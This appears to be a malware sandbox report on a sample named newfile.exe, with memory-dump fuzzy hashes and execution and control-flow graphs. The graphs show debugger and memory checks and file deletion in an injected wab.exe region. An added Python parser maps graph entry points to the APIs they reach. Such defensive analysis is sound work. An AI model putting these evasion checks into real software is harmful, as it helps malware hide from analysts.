                                                                          Target ID:24
                                                                          Start time:06:47:21
                                                                          Start date:24/04/2024
                                                                          Path:C:\Users\user\AppData\Roaming\newfile\newfile.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Roaming\newfile\newfile.exe"
                                                                          Imagebase:0x5f0000
                                                                          File size:516'608 bytes
                                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate
                                                                          Has exited:true

                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.2093882569.00007FF8883E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8883E0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_7ff8883e0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: dcc59cbad4f8cefab54df08a1d82a2ab24a30d895797c92ad9bb894cda690aad
                                                                            • Instruction ID: 4c5c0f7b69b4f129501fa27ad116e3a9365e01fd8b30b5fa7f3a13c0c7fa1170
                                                                            • Opcode Fuzzy Hash: dcc59cbad4f8cefab54df08a1d82a2ab24a30d895797c92ad9bb894cda690aad
                                                                            • Instruction Fuzzy Hash: 98D17030A18A4E8FEBA8DF2CD8557E977D1FB58340F14426AE80DC7695DF389941CB82
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.2093882569.00007FF8883E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8883E0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_7ff8883e0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 59dd41923d99f78cc68b0df9785f6771ce0fef58b6de65e93c7e086253291694
                                                                            • Instruction ID: a563520c4e1cef54d1cbe4afd630c08dab7fa5fbeafd078b3b76f49583327325
                                                                            • Opcode Fuzzy Hash: 59dd41923d99f78cc68b0df9785f6771ce0fef58b6de65e93c7e086253291694
                                                                            • Instruction Fuzzy Hash: 7CD17130A18A4D8FEBA8DF28C8557E977D1FB94350F14826ED80DC7695CF789940CB81
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.2094802796.00007FF8884B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8884B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_7ff8884b0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e68dd9d42178d34b6e89489486e817ce67115c549ea5cfb5722cdd312c0da1a2
                                                                            • Instruction ID: 01a585b78a9635a6a6f0d90cdcde8a22e99eea5fc4091f4bcd0328d44b36825c
                                                                            • Opcode Fuzzy Hash: e68dd9d42178d34b6e89489486e817ce67115c549ea5cfb5722cdd312c0da1a2
                                                                            • Instruction Fuzzy Hash: 7DD12332D4DACA4FE796DAA898556B97BA0FF51390F0901FED04DCB1D3DA18AC01C346
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.2093882569.00007FF8883E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8883E0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_7ff8883e0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                            • Instruction ID: 6a6846a1170be204d6491bac246cb17ad8b5f4e9a7921e76151924442626c0a7
                                                                            • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                            • Instruction Fuzzy Hash: 2A01677111CB0D4FDB44EF4CE451AA5B7E0FB99364F10056DE58AC36A1D736E881CB46
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.2093882569.00007FF8883E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8883E0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_7ff8883e0000_powershell.jbxd
Similarity
• API ID:
• String ID: K_^$K_^$K_^$K_^$K_^
• API String ID: 0-3188868157
• Opcode ID: 99baef2207ad6efce2ab439b82b9b5f9342fd1fa05e3152bf8f6dc0c64401980
• Instruction ID: b7453015826fabd043a02adabf3c565e83fa1cfc76f69db0b7371c5d2cad1d43
• Opcode Fuzzy Hash: 99baef2207ad6efce2ab439b82b9b5f9342fd1fa05e3152bf8f6dc0c64401980
• Instruction Fuzzy Hash: B731B39BD0DBD64FE762561898E90E52F90BF222A4F4D00F6CCA84B593FE081817D716
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000D.00000002.1837459935.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7500000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 49fdc72015437ec242f9f6bdeca7caa778a075f65a0bcabf8a0562ae7da337b6
• Instruction ID: efd46c61ac7fd34374c0addaa6eaac0b1f347d73c3b270cc5ee19e55a2f4594e
• Opcode Fuzzy Hash: 49fdc72015437ec242f9f6bdeca7caa778a075f65a0bcabf8a0562ae7da337b6
• Instruction Fuzzy Hash: CE626EB4A002189FEB24DB14C955BDDB7B2BF88304F6084EAD9096F781DB759E81CF91
Uniqueness
• Uniqueness Score: -1.00%
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1837459935.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7500000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 84l$84l$84l$84l
                                                                            • API String ID: 0-3024328185
                                                                            • Opcode ID: e4e6240cb1f73a8a7c706fa7e465b05446795d2997baccfb43b245d7993ac6c1
                                                                            • Instruction ID: 220ac119aac2388e2f1ddf7c200a94f7cd98aca937c971b4906d7295d4d6423a
                                                                            • Opcode Fuzzy Hash: e4e6240cb1f73a8a7c706fa7e465b05446795d2997baccfb43b245d7993ac6c1
                                                                            • Instruction Fuzzy Hash: 51A1B7B1710206DFDB25DB94C8447EAB7A2BF8A211F248A56E905AF3C1DA71DC41CBF1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1837459935.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7500000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (fl$(fl$(fl$(fl
                                                                            • API String ID: 0-2123353879
                                                                            • Opcode ID: 7b76461611144a9dac0a2b3b6a91c52adde88eb7c9a59dbf46fcd9af573ac49f
                                                                            • Instruction ID: 42913f7ca3a81b6955e9b6ecef79f25677d79f3e0ea0f6a42debf8871fd398db
                                                                            • Opcode Fuzzy Hash: 7b76461611144a9dac0a2b3b6a91c52adde88eb7c9a59dbf46fcd9af573ac49f
                                                                            • Instruction Fuzzy Hash: 1A716FB4A00305DFD724DBA8C451BEAB7B2BF89214F24C16AD905AB791DB72EC41CBD1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Execution Graph

                                                                            Execution Coverage:10.9%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:16.7%
                                                                            Total number of Nodes:18
                                                                            Total number of Limit Nodes:1
                                                                            execution_graph 9364 21c70b8 9365 21c70fc CheckRemoteDebuggerPresent 9364->9365 9366 21c713e 9365->9366 9367 21c8438 9368 21c847e DeleteFileW 9367->9368 9370 21c84b7 9368->9370 9371 21cf3e8 9374 21cf41a 9371->9374 9372 21cf3f6 9375 21cf42d 9374->9375 9376 21cf455 9374->9376 9375->9372 9380 21cf4f8 9376->9380 9383 21cf4f2 9376->9383 9377 21cf472 9377->9372 9381 21cf53e GlobalMemoryStatusEx 9380->9381 9382 21cf56e 9381->9382 9382->9377 9384 21cf53e GlobalMemoryStatusEx 9383->9384 9385 21cf56e 9384->9385 9385->9377
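
The execution_graph line above is the graph flattened into one token stream: a node id, its address, any API names the node calls, a "N API calls" summary on a collapsed limit node, and src->dst edges that may name nodes defined later in the stream. The Control-flow Graph and Callgraph lines on this page use the same grammar with an address range or a Function_ name in the address slot. The parser below is an added example, not Joe Sandbox code: the token grammar is inferred from the report text on this page, and the helpers that answer which APIs each entry point can reach (for the wab.exe graph: CheckRemoteDebuggerPresent, DeleteFileW and GlobalMemoryStatusEx from its three roots) are mine. WAB_GRAPH is the graph line copied from this report; FRAGMENT is constructed from a few tokens of the later 5f3xxx execution graph with a self-loop added to exercise cycle handling.

```python
"""Parse the flattened graph lines Joe Sandbox prints under "Execution Graph",
"Control-flow Graph" and "Callgraph" into nodes and edges, and list which
API calls each entry point can reach.

Added example, not Joe Sandbox code. Token grammar inferred from the report:
  <graph-name>                       first token, dropped
  <node-id> <addr|range|Function_x> [<API name> ...]
  <N> API calls                      summary attached to the preceding (limit) node
  <src>-><dst>                       edge; may reference a node defined later
"""
import re
from dataclasses import dataclass, field

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
INT_RE = re.compile(r"^\d+$")


@dataclass
class Node:
    addr: str                                  # "21c70b8", "21c70b8-21c713c" or "Function_005F1C5C"
    apis: list = field(default_factory=list)   # API names listed on this node
    note: str = ""                             # e.g. "4 API calls" on a limit node


def parse_graph(text):
    """Return (nodes, edges): nodes maps id -> Node, edges is a list of (src, dst)."""
    tokens = text.split()
    if not tokens:
        raise ValueError("empty graph")
    tokens = tokens[1:]                        # drop execution_graph / callgraph / ...
    nodes, edges, current, i = {}, [], None, 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE_RE.match(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
            continue
        if INT_RE.match(tok):
            # "<N> API calls" summarises a collapsed node; it is not a new node id
            if tokens[i + 1:i + 3] == ["API", "calls"]:
                if current is None:
                    raise ValueError("API-call summary before any node")
                nodes[current].note = f"{tok} API calls"
                i += 3
                continue
            if i + 1 >= len(tokens):
                raise ValueError(f"node {tok} has no address")
            current = int(tok)
            nodes[current] = Node(addr=tokens[i + 1])   # address always follows the id
            i += 2
            continue
        if current is None:
            raise ValueError(f"API name {tok!r} before any node")
        nodes[current].apis.append(tok)
        i += 1
    for src, dst in edges:
        if src not in nodes or dst not in nodes:
            raise ValueError(f"edge {src}->{dst} references an undefined node")
    return nodes, edges


def entry_points(nodes, edges):
    """Node ids with no incoming edge: the roots of each subgraph."""
    targets = {dst for _, dst in edges}
    return sorted(n for n in nodes if n not in targets)


def reachable_apis(nodes, edges, start):
    """All API names on nodes reachable from `start` (cycle-safe DFS)."""
    succ = {}
    for src, dst in edges:
        succ.setdefault(src, []).append(dst)
    seen, stack, apis = set(), [start], set()
    while stack:
        n = stack.pop()
        if n in seen:
            continue
        seen.add(n)
        apis.update(nodes[n].apis)
        stack.extend(succ.get(n, []))
    return apis


def api_map(text):
    """Map each entry-point address to the sorted APIs its subgraph can reach."""
    nodes, edges = parse_graph(text)
    return {nodes[r].addr: sorted(reachable_apis(nodes, edges, r))
            for r in entry_points(nodes, edges)}


# The wab.exe execution graph, copied verbatim from this report.
WAB_GRAPH = ("execution_graph 9364 21c70b8 9365 21c70fc CheckRemoteDebuggerPresent "
             "9364->9365 9366 21c713e 9365->9366 9367 21c8438 9368 21c847e DeleteFileW "
             "9367->9368 9370 21c84b7 9368->9370 9371 21cf3e8 9374 21cf41a 9371->9374 "
             "9372 21cf3f6 9375 21cf42d 9374->9375 9376 21cf455 9374->9376 9375->9372 "
             "9380 21cf4f8 9376->9380 9383 21cf4f2 9376->9383 9377 21cf472 9377->9372 "
             "9381 21cf53e GlobalMemoryStatusEx 9380->9381 9382 21cf56e 9381->9382 "
             "9382->9377 9384 21cf53e GlobalMemoryStatusEx 9383->9384 9385 21cf56e "
             "9384->9385 9385->9377")

# Constructed fragment (tokens taken from the later graph, self-loop 750->750 added)
# exercising a limit-node summary and cycle handling.
FRAGMENT = ("execution_graph 746 5f1c4d 749 5f32b0 4 API calls 746->749 "
            "750 5f1c5a LoadStringW LoadIconW 749->750 750->750")

if __name__ == "__main__":
    for addr, apis in api_map(WAB_GRAPH).items():
        print(addr, apis)
```

A cheap sanity check after parsing is that `len(nodes)` equals the report's "Total number of Nodes" line (18 for the graph above); a mismatch means a token was misread as an API name or an id. Keying the output by entry-point address rather than node id makes the reachable-API sets comparable across snapshots of the same injected region, which is how you spot an evasion routine (CheckRemoteDebuggerPresent, GlobalMemoryStatusEx) that was not executed in one run but was in another.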

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 446 21c70b8-21c713c CheckRemoteDebuggerPresent 448 21c713e-21c7144 446->448 449 21c7145-21c7180 446->449 448->449
                                                                            APIs
                                                                            • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 021C712F
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2566051486.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_21c0000_wab.jbxd
                                                                            Similarity
                                                                            • API ID: CheckDebuggerPresentRemote
                                                                            • String ID:
                                                                            • API String ID: 3662101638-0
                                                                            • Opcode ID: a56cf520269821fea0466993a92c39fc18a9e74ef2b7568d42f9ea5cd167a5f0
                                                                            • Instruction ID: f101fa9955387316fecea164ae977cf8d8294d5b3516c5ed901e4761a6ecf2cd
                                                                            • Opcode Fuzzy Hash: a56cf520269821fea0466993a92c39fc18a9e74ef2b7568d42f9ea5cd167a5f0
                                                                            • Instruction Fuzzy Hash: 1D2159B59002598FDB00CF9AD444BEEFBF4AF49310F14846AE454B7340D378A944CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 440 21c70b7-21c713c CheckRemoteDebuggerPresent 442 21c713e-21c7144 440->442 443 21c7145-21c7180 440->443 442->443
                                                                            APIs
                                                                            • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 021C712F
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2566051486.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_21c0000_wab.jbxd
                                                                            Similarity
                                                                            • API ID: CheckDebuggerPresentRemote
                                                                            • String ID:
                                                                            • API String ID: 3662101638-0
                                                                            • Opcode ID: b0892c8f3efdec4a101a86ff7a68cdd372c2f6dba63c035e90885e24d0e35fed
                                                                            • Instruction ID: 1d56b79881f1e3d7eb2d2183b5a71acff34276f004046a5b30fdf5e89e2d541a
                                                                            • Opcode Fuzzy Hash: b0892c8f3efdec4a101a86ff7a68cdd372c2f6dba63c035e90885e24d0e35fed
                                                                            • Instruction Fuzzy Hash: 682136B59002598FDB10CFA9D444BEEFBF4AF49310F14846AE455A7350D378A944CF61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 452 21c8434-21c8482 454 21c848a-21c84b5 DeleteFileW 452->454 455 21c8484-21c8487 452->455 456 21c84be-21c84e6 454->456 457 21c84b7-21c84bd 454->457 455->454 457->456
                                                                            APIs
                                                                            • DeleteFileW.KERNEL32(00000000), ref: 021C84A8
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2566051486.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_21c0000_wab.jbxd
                                                                            Similarity
                                                                            • API ID: DeleteFile
                                                                            • String ID:
                                                                            • API String ID: 4033686569-0
                                                                            • Opcode ID: 439d2eccc27e86bbda9b2d442581fd3de48c4be024c2f667ab9edfce74277653
                                                                            • Instruction ID: f713c4858349644db26f8558f5ea56aecbdf2535b9f8a7ff2c88bbe0d043df3f
                                                                            • Opcode Fuzzy Hash: 439d2eccc27e86bbda9b2d442581fd3de48c4be024c2f667ab9edfce74277653
                                                                            • Instruction Fuzzy Hash: 122133B6D1061A8FCB10CF9AD544BEEFBB0AF48320F15812AD818A7640D378A900CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 460 21c8438-21c8482 462 21c848a-21c84b5 DeleteFileW 460->462 463 21c8484-21c8487 460->463 464 21c84be-21c84e6 462->464 465 21c84b7-21c84bd 462->465 463->462 465->464
                                                                            APIs
                                                                            • DeleteFileW.KERNEL32(00000000), ref: 021C84A8
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2566051486.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_21c0000_wab.jbxd
                                                                            Similarity
                                                                            • API ID: DeleteFile
                                                                            • String ID:
                                                                            • API String ID: 4033686569-0
                                                                            • Opcode ID: 9e78e5af74685a3111282e962fc7e729c16d395b01bfc91ae7c414b6452e3a5f
                                                                            • Instruction ID: a2887edf2decbeb31376e09c53ebd73d0bfe485b17418193fe66fe3e95ad6159
                                                                            • Opcode Fuzzy Hash: 9e78e5af74685a3111282e962fc7e729c16d395b01bfc91ae7c414b6452e3a5f
                                                                            • Instruction Fuzzy Hash: 261133B6C0061A9BCB10CF9AD544BEEFBF4EF48320F15816AD818B7640D378A944CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 468 21cf4f2-21cf56c GlobalMemoryStatusEx 470 21cf56e-21cf574 468->470 471 21cf575-21cf59d 468->471 470->471
                                                                            APIs
                                                                            • GlobalMemoryStatusEx.KERNEL32 ref: 021CF55F
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2566051486.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_21c0000_wab.jbxd
                                                                            Similarity
                                                                            • API ID: GlobalMemoryStatus
                                                                            • String ID:
                                                                            • API String ID: 1890195054-0
                                                                            • Opcode ID: 0b58363cb3f413d71af5d1caaaba72366260c91598400d5bb4951f92d109f1a8
                                                                            • Instruction ID: bb01a9269538f2b41fcab37be3ee16ed17b60bee29270a51bd4f39427942937a
                                                                            • Opcode Fuzzy Hash: 0b58363cb3f413d71af5d1caaaba72366260c91598400d5bb4951f92d109f1a8
                                                                            • Instruction Fuzzy Hash: 5B1130B6C1065A9FDB10CFAAD5447EEFBF0AF48310F10816AD818A7640D378A9418FA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 474 21cf4f8-21cf56c GlobalMemoryStatusEx 476 21cf56e-21cf574 474->476 477 21cf575-21cf59d 474->477 476->477
                                                                            APIs
                                                                            • GlobalMemoryStatusEx.KERNEL32 ref: 021CF55F
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2566051486.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_21c0000_wab.jbxd
                                                                            Similarity
                                                                            • API ID: GlobalMemoryStatus
                                                                            • String ID:
                                                                            • API String ID: 1890195054-0
                                                                            • Opcode ID: 7d842a449a76b8a26cc0af82d01069bcbf2d9f1d3150a1fc2d6b46c99bca43b9
                                                                            • Instruction ID: 52621de5b11e71dca17d8871cd72c8d3bd6347663312a61f2b55720e6c651990
                                                                            • Opcode Fuzzy Hash: 7d842a449a76b8a26cc0af82d01069bcbf2d9f1d3150a1fc2d6b46c99bca43b9
                                                                            • Instruction Fuzzy Hash: 2A1112B5C0065A9BDB10CFAAD544BDEFBF4AF48320F15816AD818B7640D378A944CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2564734805.000000000219D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0219D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_219d000_wab.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: bc1b591c7f752b8eb3c6569330a8f53a8c5cf3154fc15770a6de99955782cd34
                                                                            • Instruction ID: 3ae8cd386e31cc78f1b5be149bbe60a9197abb1e41e29e36ad37aafb9851dd68
                                                                            • Opcode Fuzzy Hash: bc1b591c7f752b8eb3c6569330a8f53a8c5cf3154fc15770a6de99955782cd34
                                                                            • Instruction Fuzzy Hash: 4921F271644344DFDF14EF14E9C0B26BBA5FB88314F28C5A9D80A4B282C37AD847CB62
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2564734805.000000000219D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0219D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_219d000_wab.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3f4675e99f22990077d7ca64c846758c7cedafdaf71502d2a3914074f32ea8d3
                                                                            • Instruction ID: 9d08b917418f6741dbca1376e614dd768d372e3c2bab035a96d0fe4c5844e14e
                                                                            • Opcode Fuzzy Hash: 3f4675e99f22990077d7ca64c846758c7cedafdaf71502d2a3914074f32ea8d3
                                                                            • Instruction Fuzzy Hash: ED11DD75544280CFCB11DF14E5C4B15FFA1FB88318F28C6AAD8494B696C33AD44ACF62
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Execution Graph

                                                                            Execution Coverage:28%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:30.4%
                                                                            Total number of Nodes:217
                                                                            Total number of Limit Nodes:4
                                                                            execution_graph 874 5f31bf _XcptFilter 875 5f31d3 876 5f31ee 875->876 877 5f31e7 _exit 875->877 878 5f31f7 _cexit 876->878 879 5f3202 876->879 877->876 878->879 885 5f37c2 886 5f37d3 885->886 889 5f2f51 ResolveDelayLoadedAPI 886->889 888 5f37e0 889->888 647 5f3030 664 5f3675 647->664 649 5f3035 650 5f3046 GetStartupInfoW 649->650 651 5f3063 650->651 652 5f3078 651->652 653 5f307f Sleep 651->653 654 5f3097 _amsg_exit 652->654 656 5f30a1 652->656 653->651 654->656 655 5f30e3 _initterm 660 5f30fe __IsNonwritableInCurrentImage 655->660 656->655 657 5f30c4 656->657 656->660 658 5f31a6 _ismbblead 658->660 659 5f31ee 659->657 661 5f31f7 _cexit 659->661 660->658 660->659 663 5f318e exit 660->663 669 5f1c5c 660->669 661->657 663->660 665 5f369e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 664->665 666 5f369a 664->666 668 5f36ed 665->668 666->665 667 5f3702 666->667 667->649 668->667 733 5f37f0 669->733 673 5f1d01 HeapSetInformation 674 5f1d20 673->674 708 5f1d18 673->708 737 5f29ab CommandLineToArgvW 674->737 679 5f201a FreeLibrary 680 5f2560 679->680 683 5f256b FreeLibrary 680->683 684 5f2578 680->684 681 5f1d9c GetStockObject RegisterClassW CreateWindowExW 682 5f1e0e 681->682 681->708 751 5f1b83 memset 682->751 683->684 787 5f1ae4 684->787 689 5f1ae4 2 API calls 692 5f259a 689->692 690 5f1e2f 757 5f25d3 memset memset CommandLineToArgvW 690->757 691 5f1e22 GetLastError 691->708 791 5f32b0 692->791 696 5f25a9 696->660 698 5f1eee 699 5f1ef2 EventUnregister 698->699 701 5f1f1f memset LoadStringW MessageBoxW 699->701 702 5f1f6d 699->702 701->708 703 5f1f79 GetProcAddress 702->703 707 5f202e 702->707 703->708 705 5f2036 GetProcAddress 705->708 710 5f204e 705->710 707->705 709 5f208a 707->709 708->679 708->680 709->708 711 5f211c GetProcAddress 709->711 710->708 711->708 712 5f2136 711->712 713 5f218c memset 712->713 717 5f2225 712->717 714 5f21a9 LoadStringW 713->714 714->717 716 5f2384 718 5f238d GetProcAddress 716->718 719 5f242a 716->719 717->716 797 5f1b21 717->797 718->708 728 5f23a5 718->728 721 5f2433 GetProcAddress 719->721 722 5f24d0 719->722 721->708 729 5f244b 721->729 723 5f24d8 GetProcAddress 722->723 725 5f24f0 722->725 723->708 723->725 724 5f2525 GetProcAddress 724->708 726 5f253d 724->726 725->708 725->724 726->680 728->708 730 5f23e2 memset LoadStringW 728->730 729->708 731 5f2488 memset LoadStringW 729->731 730->719 731->722 732 5f233c memset LoadStringW 732->716 734 5f1c6b memset GetCommandLineW 733->734 735 5f1ab0 734->735 736 5f1acb 735->736 736->673 736->736 738 5f29cc 737->738 739 5f1d27 737->739 740 5f29db LocalFree 738->740 743 5f1bf4 739->743 740->739 741 5f29ec 740->741 742 5f2a08 RegisterApplicationRestart 741->742 742->739 801 5f28a4 memset 743->801 746 5f1c4d 749 5f32b0 4 API calls 746->749 747 5f1c28 PathAppendW 747->746 748 5f1c3e LoadLibraryW 747->748 748->746 750 5f1c5a LoadStringW LoadIconW 749->750 750->681 752 5f28a4 10 API calls 751->752 753 5f1bbb 752->753 753->753 754 5f1be1 LoadLibraryW 753->754 755 5f32b0 4 API calls 754->755 756 5f1bf2 755->756 756->690 756->691 758 5f2661 757->758 761 5f2888 757->761 759 5f287d LocalFree 758->759 762 5f2683 StrCmpNIW 758->762 769 5f2676 758->769 759->761 760 5f32b0 4 API calls 763 5f1e43 760->763 761->760 764 5f26f0 762->764 768 5f26a0 762->768 763->708 782 5f193a EventRegister 763->782 765 5f2741 764->765 767 5f2709 PathFindExtensionW 764->767 766 5f2761 StrCmpIW 765->766 765->769 766->765 774 5f2785 766->774 770 5f271e StrCmpIW 767->770 768->769 813 5f1b57 768->813 769->759 770->765 771 5f2730 770->771 771->769 771->770 773 5f27c0 775 5f27d3 GetFileAttributesW 773->775 774->769 774->773 776 5f27e5 775->776 780 5f2833 775->780 777 5f27ee PathRemoveFileSpecW 776->777 778 5f2811 776->778 777->778 779 5f27ff GetFileAttributesW 777->779 778->769 779->778 779->780 780->778 817 5f2b60 780->817 783 5f198b 782->783 784 5f1998 EventSetInformation 782->784 785 5f32b0 4 API calls 783->785 784->783 786 5f19c5 785->786 786->698 786->699 796 5f19c7 EventWriteTransfer 786->796 790 5f1af2 787->790 788 5f1b16 788->689 789 5f1b06 GetProcessHeap HeapFree 789->788 790->788 790->789 790->790 792 5f32bb 791->792 793 5f32b8 791->793 831 5f32c0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 792->831 793->696 795 5f33f6 795->696 796->698 798 5f1b2e 797->798 799 5f1b4d 797->799 832 5f2c36 798->832 799->708 799->732 802 5f28ee RegOpenKeyExW 801->802 803 5f299d 801->803 805 5f2989 802->805 806 5f2914 RegQueryValueExW 802->806 804 5f32b0 4 API calls 803->804 808 5f1c17 PathRemoveFileSpecW 804->808 805->803 807 5f2991 RegCloseKey 805->807 806->805 809 5f2949 806->809 807->803 808->746 808->747 810 5f296d GetFileAttributesW 809->810 811 5f2958 ExpandEnvironmentStringsW 809->811 810->805 812 5f2979 810->812 811->805 812->805 814 5f1b63 813->814 814->814 815 5f2b60 6 API calls 814->815 816 5f1b7b 815->816 816->769 818 5f2bc7 817->818 819 5f2b74 817->819 818->778 819->818 823 5f2a7e 819->823 822 5f2baa memcpy 822->818 824 5f2a95 823->824 825 5f2a8e 823->825 824->825 826 5f2ac9 GetProcessHeap HeapAlloc 824->826 825->818 825->822 826->825 827 5f2adf 826->827 828 5f2ae5 memcpy 827->828 829 5f2aff 827->829 828->829 829->825 829->829 830 5f2b33 GetProcessHeap HeapFree 829->830 830->825 831->795 833 5f2ce8 832->833 834 5f2c61 832->834 835 5f32b0 4 API calls 833->835 837 5f2a7e 5 API calls 834->837 836 5f2cf7 835->836 836->799 838 5f2c86 837->838 839 5f2cd4 838->839 844 5f2cfb 838->844 841 5f1ae4 2 API calls 839->841 841->833 845 5f2d0a 844->845 846 5f2cae 844->846 845->846 858 5f2ef8 845->858 846->839 852 5f2bd5 846->852 848 5f2d44 memset 848->846 851 5f2d4b memset 851->846 853 5f2c28 852->853 854 5f2be5 852->854 853->839 854->853 855 5f2a7e 5 API calls 854->855 856 5f2c0b 855->856 856->853 857 5f2c11 memcpy 